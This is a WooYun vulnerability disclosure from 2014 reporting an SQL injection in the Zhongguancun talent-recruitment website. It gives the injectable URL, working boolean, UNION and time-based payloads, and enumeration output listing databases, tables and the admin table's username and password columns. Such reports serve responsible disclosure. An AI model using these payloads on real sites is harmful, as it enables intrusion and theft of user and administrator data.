当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058877

漏洞标题:中关村人才网存在SQL注入漏洞可导致敏感信息泄露

相关厂商:中关村人才网

漏洞作者: 金枪银矛小霸王

提交时间:2014-04-29 16:10

修复时间:2014-06-13 16:11

公开时间:2014-06-13 16:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中关村人才网存在SQL注入漏洞可导致敏感信息泄露。

详细说明:

注入地址

http://www.zgcrc.com.cn/aboutus/?id=17


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=17 AND 7841=7841
Type: UNION query
Title: MySQL UNION query (NULL) - 38 columns
Payload: id=-5738 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a676e763a,0x56646476754d786f5957,0x3a7a66733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=17 AND SLEEP(5)
---
[13:15:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.11

available databases [10]:                                                      
[*] information_schema
[*] kh_zhaopin
[*] kh_zhaopin_20130920
[*] kh_zhaopin_20131024
[*] kh_zhaopin_20131026
[*] kh_zhaopin_data
[*] kh_zhaopin_data20130920
[*] kh_zhaopin_sqlserver
[*] mysql
[*] test

Database: kh_zhaopin_data                                                      
[79 tables]
+-------------------+
| ad_con |
| ad_con_list |
| ad_position |
| ad_temp |
| admin |
| admin_log |
| admin_role |
| album_follow |
| baoming |
| com_fuwu |
| com_notice |
| config_card |
| config_data |
| config_param |
| config_task |
| corpinfo_moban |
| credit_log |
| global_city |
| global_keys |
| goods_sort |
| guanzhu |
| hangye |
| hongbao |
| hongbao_log |
| info |
| jianli |
| jianli_com |
| jianli_education |
| jianli_language |
| jianli_liulan |
| jianli_work |
| jobfair |
| luxian |
| luxian_city |
| luxian_line |
| mail_hash |
| mail_server |
| mailtemp |
| member |
| member_company |
| member_department |
| member_personal |
| message |
| mianshi |
| minzu |
| my_ad |
| news |
| news_sort |
| notice |
| qiuzhixin |
| re_thing |
| shuju |
| shuju_xx |
| sph_counter |
| swf_more |
| szsheng |
| szshi |
| tongji |
| tongji_ips |
| tongji_ips_day |
| topics |
| user_comment |
| user_liuyan |
| user_mailqueue |
| user_remind |
| user_subs |
| user_talk |
| user_viewer |
| web_menu |
| web_notice |
| xc_jobfair |
| zhiwei |
| zhiwei_request |
| zhiwei_sort |
| zhiwei_subs |
| zhiwei_tuijian |
| zhiye |
| zhiye_sort |
| zw_record |
+-------------------+

到了这步并未继续拖

Database: kh_zhaopin_data                                                      
Table: admin
[11 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| biming | varchar(50) |
| chat | varchar(10) |
| easyset | varchar(1000) |
| id | int(10) |
| lx | int(10) |
| password | varchar(50) |
| quanxian | varchar(1000) |
| quanxian1 | varchar(1000) |
| roleIds | varchar(200) |
| username | varchar(20) |
| zhiwei | varchar(20) |
+-----------+---------------+

漏洞证明:

Database: kh_zhaopin_data                                                      
Table: admin
[11 columns]
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| biming | varchar(50) |
| chat | varchar(10) |
| easyset | varchar(1000) |
| id | int(10) |
| lx | int(10) |
| password | varchar(50) |
| quanxian | varchar(1000) |
| quanxian1 | varchar(1000) |
| roleIds | varchar(200) |
| username | varchar(20) |
| zhiwei | varchar(20) |
+-----------+---------------+

修复方案:

参数过滤,求礼物!


+-------------------------友情提示----------------------------+
|①本人未对网站做任何修改,未下载任何文件 |
|②本人没有对网站进行DOS或者其他流量攻击 |
|③本人抱着积极的态度对网站进行检查发现漏洞,并上交乌云平台 |
|④如有疑问,请联系乌云平台转联系本人,谢谢 |
+-------------------------------------------------------------+

版权声明:转载请注明来源 金枪银矛小霸王@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝